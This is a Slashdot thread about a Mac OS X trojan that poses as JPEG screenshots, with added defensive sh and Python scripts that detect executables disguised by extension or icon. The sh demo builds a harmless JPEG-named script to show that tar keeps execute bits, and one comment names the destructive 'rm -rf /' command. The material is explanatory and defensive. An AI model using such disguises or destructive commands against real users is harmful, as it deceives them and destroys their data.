    119. Re:Trojan Man? by raddan · · Score: 1

      When you run file on an application bundle, file tells you that it is a directory. Which it is. So this isn't an obvious help to a newb.

    120. Re:Trojan Man? by Anonymous Coward · · Score: 1, Informative

      Many ways to find the extension:

      1) Finder -> Preferences -> check "Show all file extensions"
      or
      2) Select file in Finder window and "Get Information" (cmd-i)
      or
      3) Select file in Finder window, set to view "Column" (cmd-3), and select file. (File info appears in next column)
      etc.

    121. Re:Trojan Man? by qzulla · · Score: 1
      That's not to say that you can't have root-like privs -- the default first user on a Mac is an "Administrator," which just means that they can sudo -s and become root temporarily. However to do this you have to authenticate for every action. (Or every 5 minutes or so.)

      Nope. Once you sudo -s to a root shell it is yours forever and ever. You are thinking of sudo a_command. There is the timer on that method.

      qz

    122. Re:Trojan Man? by Ford+Prefect · · Score: 4, Informative
      If, like many more computer literate users, you elect to "show all file extensions" (Finder:Preferences:Advanced), this "virus" (which is actually a trojan of course) will show up as YaddaYadda.jpg.app and you'll see that it's just a lame attempt at a trojan.

      Actually, it seems that (as of 10.4.5, anyway) it'll show as 'YaddaYadda.jpg.app' even if you have the 'Show all file extensions' switched off - a bit of experimentation shows that if the first extension (in this case '.jpg') is a recognised file-type, then the '.app' gets shown as well.

      So, from a display point of view:

      • YaddaYadda.app -> YaddaYadda
      • YaddaYadda.foo.app -> YaddaYadda.foo
      • YaddaYadda.jpg.app -> YaddaYadda.jpg.app
      • YaddaYadda.pdf.app -> YaddaYadda.pdf.app
      ... and so on.

      Basically, if it's trying to impersonate another existing file-type, it'll tell you.

      --
      Tedious Bloggy Stuff - hooray?
    123. Re:Trojan Man? by Diordna · · Score: 1

      Actually, if you try to open any app for the first time, it asks you first.

    124. Re:Trojan Man? by Diordna · · Score: 1

      Actually, there are 3 different kinds of Mac executables.

      1. The "package" format you just mentioned, which is a folder structure with a UNIX binary in it, which is what most OS X binaries are
      2. A UNIX binary, no package, which a lot of OSS uses
      3. A Carbon app, which will also run in OS 9, which no one uses anymore

      You can change a plain ol' UNIX binary into a package by creating a certain folder structure and renaming the main folder thingy.

    125. Re:Trojan Man? by Anonymous Coward · · Score: 0
      ...alongside prompting the user before running the executable for the first time (as is currently the case).
      ;P
    126. Re:Trojan Man? by Petrushka · · Score: 1

      How do you turn on file extensions in OS X? I don't normally use a Mac, so I don't know this, but obviously it would be useful to know for when I do.

    127. Re:Trojan Man? by Anonymous Coward · · Score: 0

      Something like this in the code that unpacks tar files would go a long way toward fixing it.

      This is already the case. For this "virus" to take effect, you have to dismiss that dialog. In other words: you were warned.

    128. Re:Trojan Man? by Anonymous Coward · · Score: 0

      unless, of course, this is the correct behavior, like, say, a tarball that preserves the file rights.

      Now, double-clicking on a tarball that launches an exe automatically is a different issue ... such a helpful OS would remind one quite a lot of Windows/Clippy.

    129. Re:Trojan Man? by dr.badass · · Score: 1

      I've seen Windows' "hide extensions for known file types" option described as an OS flaw in the past

      The complaint is usually that not only does Windows hide extensions, but it doesn't let you modify them. Since extensions are the only way that Windows determines file types and associations, this is an incredible pain in the ass. In Mac OS X, not only can you change hidden extensions, but you rarely need to because associations can also be determined by type/creator codes, MIME types, and Uniform Type Identifiers.

      So, it's not really the same thing.

      --
      Don't become a regular here -- you will become retarded.
    130. Re:Trojan Man? by Anonymous Coward · · Score: 0

      IMO tar should have a separate flag that tells it to preserve the potentially dangerous execute permission.

    131. Re:Trojan Man? by leenks · · Score: 1

      Windows users get a key that does the same as right clicking (the Context key, seen here on the right). If you want to use a single button mouse you can, but quite why the hell you would want to is beyond me!

    132. Re:Trojan Man? by zsau · · Score: 1

      On GNU/Linux, there's no general way that always works; the exact method depends on what environment you choose to use.

      In general, executable files have a piece of metadata set that makes them so. Whether executable bits over-ride the other ways of determining the file-type is up to the environment...

      Many environments use extensions for others, so that executables will have no extension, but jpegs will be .jpg and so forth. Most software that has a file open dialog box will filter by extensions, though not all of them do. Extensions are rarely if ever hidden, but they're much less necessary so I have no problems with creating a Gimp image called "Flag of Victoria" instead of "Flag of Victoria.xcf". Still, most files intended for public distribution have extensions.

      Many environments will look inside a file to determine its type. This way, if you get a file named "frog.jpg" but its contents are actually ASCII text (e.g. for a shell script or to launch a vulnerability in the JPEG libraries) it'll show up as an ASCII text file and the system will alert you to a possible security problem.

      Some file systems have metadata for file types as well; some user environments will use these.

      HTH!

      --
      Look out!
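
Editor's added example, not code from any of the posters above nor from Apple or GNOME: the Nautilus warning croddy quotes (comment 89), the `file`/Get Info advice in comments 88, 98 and 115, the "executable jpgs" cron job suggested in comment 115, the `.jpg.app` double-extension observation in comment 122 and zsau's "look inside the file" point in comment 132 all come down to the same test, which this POSIX sh script performs for a single path or a whole download directory. It compares the type the extension claims against the type the first bytes of the content indicate, records the execute bit, and treats a directory containing Contents/MacOS as an application bundle (plain `file` only says "directory" for a bundle, as raddan notes in comment 119). The magic numbers are the standard JPEG, PNG, GIF, PDF, ELF and Mach-O ones; the file names in the test are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread or from Apple: a POSIX sh version
# of the "does the name match the contents?" check that Nautilus performs,
# plus the execute-bit and double-extension checks suggested above.

# Type promised by the file name's extension (case-insensitive). "none" for
# extension-less names, which is how ordinary Unix executables look, and
# "other" for extensions this script does not know how to verify.
claimed_type() {
    case $(basename "$1" | tr 'A-Z' 'a-z') in
        *.jpg|*.jpeg|*.png|*.gif) echo image ;;
        *.pdf)                    echo document ;;
        *.app)                    echo app-bundle ;;
        *.*)                      echo other ;;
        *)                        echo none ;;
    esac
}

# Type indicated by the content itself (first four bytes), or by the bundle
# layout for a directory, since `file` just says "directory" for a bundle.
actual_type() {
    if [ -d "$1" ]; then
        if [ -d "$1/Contents/MacOS" ]; then echo app-bundle; else echo directory; fi
        return
    fi
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    case $magic in
        ffd8ff*)            echo image ;;       # JPEG
        89504e47)           echo image ;;       # PNG
        47494638)           echo image ;;       # GIF8
        25504446)           echo document ;;    # %PDF
        7f454c46)           echo executable ;;  # ELF
        feedface|cefaedfe)  echo executable ;;  # Mach-O 32-bit, either byte order
        feedfacf|cffaedfe)  echo executable ;;  # Mach-O 64-bit
        cafebabe)           echo executable ;;  # universal (fat) Mach-O; also Java .class
        2321*)              echo executable ;;  # "#!" interpreter script
        *)                  echo unknown ;;
    esac
}

# Examine one path; prints a one-line verdict and returns 0 only if the
# file looks honest about what it is.
check_download() {
    path=$1
    claimed=$(claimed_type "$path")
    actual=$(actual_type "$path")
    xbit=no
    if [ -f "$path" ] && [ -x "$path" ]; then xbit=yes; fi
    verdict=ok

    # A picture or document should never carry the execute bit.
    if [ "$claimed" = image ] || [ "$claimed" = document ]; then
        if [ "$xbit" = yes ]; then verdict="execute bit set on a $claimed"; fi
    fi

    # Content disagrees with the extension (the Nautilus check). Names with
    # no extension or an unknown one are not judged.
    if [ "$claimed" != none ] && [ "$claimed" != other ] && [ "$claimed" != "$actual" ]; then
        verdict="extension says $claimed, content is $actual"
    fi

    # A bundle named like a document, e.g. latestpics.jpg.app (comment 122).
    if [ "$claimed" = app-bundle ]; then
        inner=$(claimed_type "${path%.app}")
        if [ "$inner" = image ] || [ "$inner" = document ]; then
            verdict="application bundle disguised as a $inner"
        fi
    fi

    printf '%s: claimed=%s content=%s exec=%s -> %s\n' \
        "$path" "$claimed" "$actual" "$xbit" "$verdict"
    [ "$verdict" = ok ]
}

# Sweep a directory (e.g. ~/Downloads from cron); returns non-zero if
# anything in it was flagged.
scan_downloads() {
    bad=0
    for entry in "$1"/*; do
        [ -e "$entry" ] || continue        # empty dir leaves the glob unexpanded
        if ! check_download "$entry"; then bad=$((bad + 1)); fi
    done
    echo "$bad suspicious item(s) in $1"
    [ "$bad" -eq 0 ]
}
```

`check_download latestpics.jpg` reports on one file; `scan_downloads ~/Downloads` is the scheduled-job form comment 115 asks for. Anything that is a data file by name but executable by content or permission, or an .app bundle named like a document, is printed and the function returns non-zero. Files with no extension are deliberately left alone, since that is what every ordinary Unix binary looks like; the script tells you *that* such a file is executable but does not call it suspicious.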
    133. Re:Trojan Man? by Durandal64 · · Score: 1
      It does not have 'helper apps'? It does not start the program bittorrent when download a .torrent? Does it run a plugin when the page states it to do it, like when you enter the site 'trailers.apple.com'?
      Uh, well yeah, it supports plug-ins. But that's not what you asked. When I download an MP3, it doesn't automatically open in iTunes.
    134. Re:Trojan Man? by NutscrapeSucks · · Score: 1

      Oh, and the +x access to the file is coming from the tar archive, just the same as it would on any UNIX style OS.

      So basically all this talk about Execute permissions being a protection against trojans on *nix is a heap of shit then?

      --
      Whenever I hear the word 'Innovation', I reach for my pistol.
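
Editor's added example, not from cmdrbuzz, NutscrapeSucks or anyone else in the thread: the point made in comments 109, 128, 130 and 134, that the execute bit comes out of the archive along with the file, shown concretely, together with the post-extraction fix. Neither GNU nor BSD tar has a flag that drops execute bits on extraction (`--no-same-permissions` only applies the umask, and a 022 umask leaves x alone), so the fix is a chmod pass over what was unpacked. The archive, its member name and the script inside it are constructed for the example; a .tgz behaves the same way once -z is added.

```shell
#!/bin/sh
# Added example (not from the thread): the execute bit travels inside a tar
# archive, so "downloaded files aren't executable by default" does not hold
# for anything you unpack. Shows the member listing, plain extraction, and
# an extraction that strips x from every regular file.

# Build ARCHIVE (absolute path) containing one member: a shell script named
# like a JPEG, with mode 755 set by whoever created the archive.
make_disguised_archive() {
    case $1 in /*) ;; *) echo "make_disguised_archive: use an absolute path" >&2; return 1 ;; esac
    src=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho "not a picture"\n' > "$src/latestpics.jpg"
    chmod 755 "$src/latestpics.jpg"
    ( cd "$src" && tar -cf "$1" latestpics.jpg )
    rm -rf "$src"
}

# List regular-file members that carry an execute bit, from the verbose
# listing (the mode string is the first field in both GNU and BSD tar).
# Worth running before double-clicking anything called "pics".
list_executable_members() {
    tar -tvf "$1" | awk '$1 ~ /^-.*x/'
}

# Plain extraction into DIR, as Finder's archive helper or `tar xf` does it.
# As a normal user only the umask is applied, and 022 keeps the x bits.
extract_plain() {
    mkdir -p "$2" && tar -xf "$1" -C "$2"
}

# Extraction into DIR followed by clearing x on every regular file.
# Directories keep their x (search) bit so the tree stays traversable;
# a script you actually want to run can be chmod +x'ed deliberately later.
extract_noexec() {
    mkdir -p "$2" && tar -xf "$1" -C "$2" || return 1
    find "$2" -type f -exec chmod a-x {} +
}

# 0 if PATH is a regular file the caller can execute.
is_executable() {
    [ -f "$1" ] && [ -x "$1" ]
}
```

`list_executable_members latestpics.tgz` (with -z added to the tar call for a gzipped archive) answers the question before anything is unpacked; `extract_noexec latestpics.tar ~/Downloads/latestpics` is what a download handler would do if it wanted the "no execute bit until you ask for it" behaviour comment 130 proposes.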
    135. Re:Trojan Man? by bogado · · Score: 1

      Ok, so I had chosen a bad example. :-) But I guess you got my point, didn't you?

      --
      []'s Victor Bogado da Silva Lins

      ^[:wq

    136. Re:Trojan Man? by Myopic · · Score: 1

      but then safari wouldn't unpack the archive. i still want it to do that, i just don't need to be told that the archive contains an application. many annoying messages in different programs have a little checkbox for "Don't Show This Message Again", and it's inconceivable why this particular message doesn't have that.

    137. Re:Trojan Man? by Myopic · · Score: 1

      why you would ever want to is beyond me, too, and why it took apple twenty years to release one is unimaginable to me. nevertheless, two-button mice cost under ten dollars, so anyone who can afford a Mac can afford a two-button mouse if they want one.

      thanks for the point of order re: the context key. (do all keyboards have that?) see? why is anyone complaining? both Win and Mac have it both ways -- consumer choice! have it any way you want it!

    138. Re:Trojan Man? by leenks · · Score: 1

      Not all keyboards have it, but all those made for Windows95 and later will do (except laptop keyboards that seem to often omit it). You can always bind it to another key using the MS keyboard layout creator (if you know about the tool and where to download it!). Or just use a two button mouse.. personally I miss paste on the middle button though if I do that :-)

    139. Re:Trojan Man? by mr100percent · · Score: 1

      Enticing users to rely entirely on an icon to suggest the content and intention of a file is plain ridiculous.

      Well, I'm sure people would wonder why they have to enter their system administrator password in order to VIEW a picture.

    140. Re:Trojan Man? by mr100percent · · Score: 1

      I believe they already have badges for all the Applescript compiled scripts.

      OS X is already secure enough that when you double-click on a new document it says "This will open (some application) that has not been run before on this computer. Are you sure?" and you have the option to view the location of the application, run it, or cancel.

    141. Re:Trojan Man? by Anonymous Coward · · Score: 0
    142. Re:Trojan Man? by Starxxon · · Score: 1

      Actually, if you try to open any app for the first time, it asks you first.
      I feel like I'm repeating myself, but it doesn't display any dialog in this particular case. It should though and I hope Apple fixes this.

    143. Re:Trojan Man? by Grail · · Score: 1

      How about... we have a new option (or two) for file systems, one which says to the operating system, "nothing on this volume is supposed to be an application, stuff on this volume is end-user data only!"

      We could call it the "No Applications" flag (or NOAPP for short).

      Then you could make sure that user's home directories (and in fact, all user-modifiable directories) are on volumes mounted with the NOAPP flag.

      Though I guess Unix aficionados would want to use the term "executable" rather than "application"... so we'd have to have a "NOEXEC" flag.

      Oh wait...

      noexec Do not allow execution of any binaries on the mounted file system. This option is useful for a server that has file systems containing binaries for architectures other than its own.

      Now I just have to find out if Mac OS X honours this for application bundles...

    144. Re:Trojan Man? by Grail · · Score: 1

      To work properly though, Apple would have to ship Mac OS X as follows:

      • Have an administrator account pre-configured
      • Require the user to set up a limited user account as their first task with turning on the machine, immediately following the notification about the administrative user (ie: the administrator account is xyz, please enter a password that will be required for performing administrative operations on this computer)
      • Have /Users on a separate partition which is mounted noexec
      • Hope that users don't go circumventing these protection measures to run trojans posing as screenshots of 10.5...

      But how do you go about educating non-geeks about computer security in fifty words or less?

  3. It's not a virus... by xwizbt · · Score: 5, Informative

    Note the following from http://www.ambrosiasw.com/forums/index.php?showtopic=102379 :

    You cannot be infected by this unless you do all of the following:

    1) Are somehow sent (via email, iChat, etc.) or download the "latestpics.tgz" file

    2) Double-click on the file to decompress it

    3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

    You cannot simply "catch" the virus. Even if someone does send you the "latestpics.tgz" file, you cannot be infected unless you unarchive the file, and then open it.

    1. Re:It's not a virus... by slungsolow · · Score: 3, Insightful

      If I have to type in my System Admin password to install it, then I don't consider it a threat. This seems like a rather lame attempt at a vulnerability. The folks who would be interested in screenshots of 10.5 are the kind of folks who know an archive of photos does not require an admin password.

    2. Re:It's not a virus... by pulse2600 · · Score: 0

      Um, this sounds very similar to a variety of Windows vulnerabilities...why aren't people jumping down Apple's throat about their insecurity as well? Or should OSX be held to a different standard than Windows?

      Windows malicious graphic flaw comes out: OH NOES MICRO$OFT IS TEH EVIL SUKK0RS!!!!111!one

      MAC OSX malicious graphic flaw comes out: "You cannot simply "catch" the virus. Even if someone does send you the "latestpics.tgz" file, you cannot be infected unless you unarchive the file, and then open it."

      BTW I am not trying to attack the parent, just using his words as an example of how many people perceive security issues based on what OS is affected. Based on the parent's analysis of the vulnerability I believe he would apply the same logic and risk assessment if this was a Windows flaw.

    3. Re:It's not a virus... by strider44 · · Score: 2, Interesting

      Hmm reading the article and the forum threads it seems that the trojan wrecks the user account should it be run, so you don't have to enter the Admin password.

      In other words MacOSX is giving *some* protection in that it can only attack the user that runs it, but that protection is shallow comfort. KDE has the best approach I think in this in that every executable, no matter what the extension etc, has the same executable icon. It also doesn't have automatic autoplay (possibly the worst "feature" of Windows). The icon of course in this case is what the trojan is exploiting.

      I'm not sure about this though, but don't Macs like KDE instead of showing an icon for JPEGs show a preview of the picture instead of a standard icon?

    4. Re:It's not a virus... by slungsolow · · Score: 1

      you missed the part about typing in an admin password. windows doesn't have that additional layer of security on it. You can unarchive and open it under any user account. It will infect the whole computer. with a mac, you can unarchive it and attempt to open it with any user account. but in the end, you can't actually open it without root access. any computer user should immediately suspect something when a jpg requires your system admin password (and I believe in this case it would require the sys admin username and password).

    5. Re:It's not a virus... by minus_273 · · Score: 1

      "MAC OSX malicious graphic flaw comes out: "You cannot simply "catch" the virus. Even if someone does send you the "latestpics.tgz" file, you cannot be infected unless you unarchive the file, and then open it.""

      maybe because it is not a flaw. There have always been malicious programs for OSX, the rm -rf / script comes to mind. But like all of them, you have to manually download, decompress, run it and then type your admin password. That is not a flaw.

      --
      The war with islam is a war on the beast
      The war on terror is a war for peace
    6. Re:It's not a virus... by Anonymous Coward · · Score: 0

      Um, this sounds very similar to a variety of Windows vulnerabilities

      Um, this sounds nothing like any Windows vulnerabilities at all, ever. This is a trojan, and can be done on any Operating System ever. It's like someone sending your Windows using ass an executable over AIM with the message "LOL this si teh gretats game EVAR!!!1!1" and you running it as a local Administrator. How the fuck would that be Microsoft's problem?

      Based on the parent's analysis of the vulnerability I believe he would apply the same logic and risk assessment if this was a Windows flaw.

      Based on my analysis of your post, I believe you're a dumbass. I say that as a non-Mac user, by the way.

    7. Re:It's not a virus... by pubjames · · Score: 5, Insightful

      Can you explain to me where the security flaw in OSX is in this case?

      There is no double standard here.

    8. Re:It's not a virus... by hattig · · Score: 1

      You have to admit though that many Mac users would like to see Panther pictures, and this is a good way of propagating the trojan.

      What can you do about it? User education is the only way.

      Otherwise, mark downloaded files as 'downloaded', and when unzipping such files apply that to all files inside too. Upon first access to a 'downloaded' application you should ask the user if they want to run the application. For a real data file there's no issue, it'd open in Preview, etc. It would catch applications pretending to be datafiles though, and equally it wouldn't stop terminally retarded people running it. Hopefully other people would go 'hang on, this isn't an application...' and thus save their computer.

    9. Re:It's not a virus... by confused+one · · Score: 3, Insightful
      Yes... Unfortunately the Windows user world has shown that more than enough people will

      1. download it

      2. double-click and decompress it.

      3. double-click and execute it.

    10. Re:It's not a virus... by Anonymous Coward · · Score: 0

      The image preview as icon is an option you have to enable, but yes, there is that option.

      Of course, that would simply mean that any old pretty-picture icon would do the same job as the jpeg icon...

    11. Re:It's not a virus... by WhiteWolf666 · · Score: 2

      It's not a malicious graphic flaw. It's an executable file, for christ sake.

      It does not use the Operating System's JPEG handling code. Its an executable, like any other. Running this program is no different than dragging your home directory to the trash; both require user stupidity.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
    12. Re:It's not a virus... by Shishak · · Score: 5, Informative

      Um.. no, completly different

      In the Windows scenario you have a real .JPG image which contains code inside of it that crashes the Windows JPG image library. The code in the image is then executed. In essence, in Windows a .JPG image file can become an executable running as user admin. This executable now has full access over your computer. This image can be embedded in an e-mail/web page and will execute, launch and own your machine without having you do anything but go to a website or read your e-mail.

      In the Mac scenario you have an executable which is made to look like an image because its icon was changed. The computer itself knows that it isn't an image so it doesn't try to load it automatically from e-mail or web. This 'virus' is designed to trick the user. The user needs to double click and run the executable. It will then try to write into a protected directory and the OS will prompt the user for the admin password. If the user is dumb enough to click on an executable *and* enter the admin password there really isn't much else you can do. The executable never actually crashes any part of the OS to gain control of the OS and do something that the user doesn't authorize.

      --
      Now I hope and pray that I will But today I am still, just a bill
    13. Re:It's not a virus... by bogado · · Score: 2, Insightful

      Even better, I think, is not to allow direct execution from the desktop shell. If you want to execute something, make a 'desktop' file pointing to it. Also don't permit desktop files to have relative URLs; if this was possible an attacker could send the .desktop file with the executable in the same compressed file.

      --
      []'s Victor Bogado da Silva Lins

      ^[:wq

    14. Re:It's not a virus... by Anonymous Coward · · Score: 0

      You don't need to type in your admin password to install it. The default user account on OS X is the admin user, who already has rights to write to many files in /Library/ and /Applications/. Most users don't know that they shouldn't use this account except to install software, because the system setup that ran when they bought their Macs welcomed them to use it!

    15. Re:It's not a virus... by lenhap · · Score: 2, Informative

      Macs do show a preview of the picture instead of the icon for JPEGs IF the user has clicked on the file in the Finder window (the three panel view), in which case it also will have text telling the user the type of file. In this case it would continue to display the JPEG icon instead of showing a preview of the picture and the text would tell you it was an "application (powerpc)" or something like that.

      Another thing of note is that if this file was downloaded through Safari, Safari would attempt to uncompress the file and then warn the user that there are executable files in the compressed file, asking if the user wants to continue (uncompressing the file). So if it was downloaded through Safari, the user would be notified of the file's applicationess vs. normal jpegness. Also, Safari does not ever execute downloaded files for the user. I am not certain, but I would guess that using iChat would do the same with a downloaded/transferred file. Also, Apple has a Finder option to always display the file extension of every file (off by default) which would make this file be titled something like "newOSpreview.jpeg.app" which would hopefully catch the user's attention. One other thing to note is that if the user downloaded the file using Safari, the default save location is the desktop which would mean the user wouldn't get the aforementioned preview of the file if they clicked on it (or double clicked).

      The trade-off here is that with customizable icons, the applications (which are often executed from the dock or the Finder) are more identifiable to users vs. the way KDE does it. Under Mac OS X the user would only have the application name to find a file, which is far more difficult than identifying an icon of the application wanted. However KDE uses a "launch" button much like Windows so identifying an application (or executable script or whatnot) by icon is not needed.

    16. Re:It's not a virus... by mdwh2 · · Score: 1

      you missed the part about typing in an admin password. windows doesn't have that additional layer of security on it. You can unarchive and open it under any user account. It will infect the whole computer. with a mac, you can unarchive it and attempt to open it with any user account. but in the end, you can't actually open it without root access.

      A password is an extra step, but it won't make a difference to most home users, compared with say all the "I LOVE YOU" Windows worms which people happily criticised Windows for, despite also needing user intervention. If a user is stupid or trusting enough to run a file he's been sent, then he'll happily type in his password to get what he wants.

      any computer user should immediately suspect something when a jpg requires your system admin password (and I believe in this case it would require the sys admin username and password).

      Any knowledgable computer user. Most people won't understand why sometimes a password is needed and sometimes it isn't. And a knowledgable computer user knows enough to be suspicious of files he receives anyway.

    17. Re:It's not a virus... by nicolas.kassis · · Score: 1
      It's called "The User"

      This hole has never been fixed. Simply because it doesn't want to.

      Nic
      -------
      www.nickassis.net

    18. Re:It's not a virus... by Anonymous Coward · · Score: 0

      GP poster is incorrect by saying it is a graphics flaw...it is not a graphics flaw it is a malicious app masquerading as an image file, however when the same thing happens with Windows and VBScripts disguised as a pic of Anna Kournikova or something similar comes out so many still come out and say it's a Windows problem...and yes Windows home users have admin access all the time but not in a corporation. I have been on many an OSX box where I did not need an admin password to decompress a file and run what is contained in it. This may be due to the specific config of the box, but I do agree with GP that many do look at Windows and say it's a Windows problem while they say that Linux/OSX is not the problem, it's the user or the admin who configured the box or some other reason they can come up with to avoid claiming that their thing is better. The truth is that all OSes can be affected by this same concept of exploitation and to single out one vendor in cases like this is irresponsible. I do not claim OSX is the problem here, and GP appears to be trying to make this point but simply not saying it the right way, especially because of the incorrect assessment that it is a flaw in graphics processing. I might restate his/her post by saying that when this type of a trojan happens on a windows box many claim it to be a windows problem, but when it happens on some other os then that os is suddenly not the issue. The GP is not blaming OSX, rather making a point that OSX (or any other os) has this problem just as much as Windows does, but Windows gets the harder rap.

    19. Re:It's not a virus... by InsaneGeek · · Score: 1

      I think when he says "double standard" he means that everybody jumped up and down about the Kama Sutra worm, people here were calling for massive lawsuits, and that Microsoft must be legally required to do something about this. When the Kama Sutra worm also required someone to go and click and go through the motions just like this one. If MS gets held to one standard of it being their fault, then Apple should logically have the same fault. I'd venture a statement that neither are at fault, you just can't out-program end user stupidity and for both it's stupidity that's at fault.

    20. Re:It's not a virus... by Steve+Cowan · · Score: 2, Informative
      The folks who would be interested in screenshots of 10.5 are the kind of folks who know an archive of photos does not require an admin password.
      I wanted to believe that too, until I saw the thread that this file was initially posted in.
    21. Re:It's not a virus... by diegocgteleline.es · · Score: 1

      There is a double standard in slashdot - most of the latest windows "virus" warnings weren't really viruses, but trojans that users needed to double click to make them work.

      People are criticizing Windows for not providing "security" measures against those files so I don't see why you wouldn't do the same for mac os x - when thousands of people are being infected by such things, even if there's not a security hole something is failing somewhere, and I'd argue that those thousands of users shouldn't need to take computing classes to have a secure system.

    22. Re:It's not a virus... by Steve+Cowan · · Score: 1

      Is this a "security flaw"?

      If you're signed in as an admin user you have full write access to the /Applications directory. As a result this executable, when launched, can infect your apps without requiring further interaction, when you are signed in as an administrator.

    23. Re:It's not a virus... by the_wesman · · Score: 1

      I hate to nitpick your work, but step #2 should not be in your list. Why? I've never double-clicked on a tgz file (or a zip, or a gz or whatever) on a mac because the file opens automagically in stuffit expander when you download it. So, the average out-of-the-box mac user will download it and just double-click on the 'image' that comes out. I feel that you added this step to give the impression that the user has this virtual scavenger hunt of tasks to perform when, in fact, there are only two actions. Furthermore, the actions are closely related. Who _doesn't_ open a file after downloading it? So, you are correct that there are multiple steps, but they're common steps that almost anyone (yourself included) is likely to perform.

      Additionally, I read your comments posted on the bulletin board to which you linked (the relevant ones are copied below). You make one comment that says that the virus doesn't propagate, and then another that says it tries to propagate. Am I missing some subtle distinction here? You use the phrase "self-propagate" - how else would it propagate? _it_ issues some command to spread itself. The user is certainly not going to burn it to CD and hand it out to his friends. Even propagation through a third party utility (in this case, iChat) that is instigated by the file-which-is-to-be-propagated fits the definition of self-propagation. What are you getting at with these items?

      -- This should probably be classified as a Trojan, not a virus, because it doesn't self-propagate externally
      -- It doesn't actually do anything other than attempt to propagate itself via iChat

      --
      calling all destroyers
    24. Re:It's not a virus... by IamTheRealMike · · Score: 2, Informative
      The flaw is that a file of one type is able to present itself as a file of another. This flaw was widely exploited in Windows a few years ago with the notorious "britney.jpg .vbs" type attacks, in which even though the icon was wrong (!!) people saw the file extension and opened it.

      On Linux MIME scanning is used to make this type of attack significantly harder. A file's icon is assigned by the operating system according to what type of file it actually appears to be, and executables cannot choose their own icons.

      The fact that the virus then injects itself into other processes and takes control of them is nothing we haven't seen before on Windows.

      I do not see in the Ambrosia writeup where the administrator password is required. If you aren't root it simply places the app hook in a different (but equally effective) location.

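Comments 8 and 24 above describe the same defensive idea from two sides: decide a file's type from its content rather than from the icon or extension it carries, and carry a 'downloaded' mark through archive extraction so that the first launch of a downloaded executable is always challenged. The following is an added example written for this page, not code from the thread, from Apple, or from any desktop environment; the archive members, their names, and the small magic-number table are constructed for the demonstration (a real scanner would use libmagic or the system's UTI/MIME database).

```python
"""Content sniffing plus 'downloaded' propagation for an extracted archive.

Added example (not from the Slashdot thread, Apple or KDE). The sample
archive and the magic-number table below are constructed for illustration.
"""
import io
import tarfile
from dataclasses import dataclass
from typing import List

# Leading bytes the sniffer recognises (assumption: small fixed table, not libmagic).
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
EXEC_MAGIC = {
    b"\xfe\xed\xfa\xce": "mach-o 32-bit",          # MH_MAGIC, big-endian (PowerPC)
    b"\xce\xfa\xed\xfe": "mach-o 32-bit",          # MH_MAGIC, little-endian (x86)
    b"\xfe\xed\xfa\xcf": "mach-o 64-bit",
    b"\xcf\xfa\xed\xfe": "mach-o 64-bit",
    b"\xca\xfe\xba\xbe": "mach-o universal (fat)",  # also Java class files; good enough here
    b"\x7fELF": "elf",
    b"MZ": "pe/dos",
}
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")


def sniff(head: bytes) -> str:
    """Classify a file by its first bytes; a shebang counts as an executable script."""
    if head.startswith(b"#!"):
        return "script"
    for magic, kind in EXEC_MAGIC.items():
        if head.startswith(magic):
            return kind
    for magic, kind in IMAGE_MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


@dataclass
class Finding:
    name: str
    claimed: str        # what the name (and therefore the icon a user sees) suggests
    actual: str         # what the bytes say
    is_executable: bool
    downloaded: bool    # the 'downloaded' mark inherited from the archive
    suspicious: bool    # claims to be an image but is executable


def inspect_archive(tgz: bytes, downloaded: bool = True) -> List[Finding]:
    """Sniff every regular file in a .tgz and propagate the archive's 'downloaded' mark."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tgz), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            head = tar.extractfile(member).read(16)
            actual = sniff(head)
            claimed = "image" if member.name.lower().endswith(IMAGE_EXTENSIONS) else "other"
            # Executable by content (known binary/script header) or by mode bits.
            is_exec = actual in EXEC_MAGIC.values() or actual == "script" or bool(member.mode & 0o111)
            findings.append(Finding(member.name, claimed, actual, is_exec,
                                    downloaded, claimed == "image" and is_exec))
    return findings


def should_prompt(f: Finding) -> bool:
    """Comment 8's rule: first launch of a 'downloaded' executable asks the user,
    whatever icon or extension the file carries."""
    return f.downloaded and f.is_executable


def build_sample_archive() -> bytes:
    """Constructed sample: a genuine JPEG stub, an executable named like a JPEG, a text file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(name: str, payload: bytes, mode: int) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            info.mode = mode
            tar.addfile(info, io.BytesIO(payload))
        add("latestpics/leopard1.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 28, 0o644)
        add("latestpics/leopard2.jpg", b"\xce\xfa\xed\xfe" + b"\x00" * 28, 0o755)
        add("latestpics/README.txt", b"screenshots\n", 0o644)
    return buf.getvalue()


if __name__ == "__main__":
    for f in inspect_archive(build_sample_archive()):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{f.name}: claims {f.claimed}, is {f.actual}, prompt={should_prompt(f)} [{flag}]")
```

The point of `should_prompt` is that it never looks at the icon or the name at all: once the archive is marked as downloaded, every executable inside inherits that mark and is challenged on first launch, which is exactly the gap the icon swap exploits. The `suspicious` flag is the stricter content-versus-claim check from comment 24, useful for a scanner that wants to warn before the user ever reaches the launch prompt.
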
    25. Re:It's not a virus... by Kadin2048 · · Score: 1

      It's called "The User"

      There are platforms which do not experience this flaw, however.

      NeXTSTEP comes to mind....

      (Apologies to anyone out there still using a Black Box.)

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    26. Re:It's not a virus... by pubjames · · Score: 1

      Good point. But is it really true that a Linux exe can't have its own icon? I thought they could... Or perhaps they can only once installed by the user? If so, then that makes a lot of sense.

    27. Re:It's not a virus... by Shanep · · Score: 1

      you missed the part about typing in an admin password. windows doesn't have that additional layer of security on it.

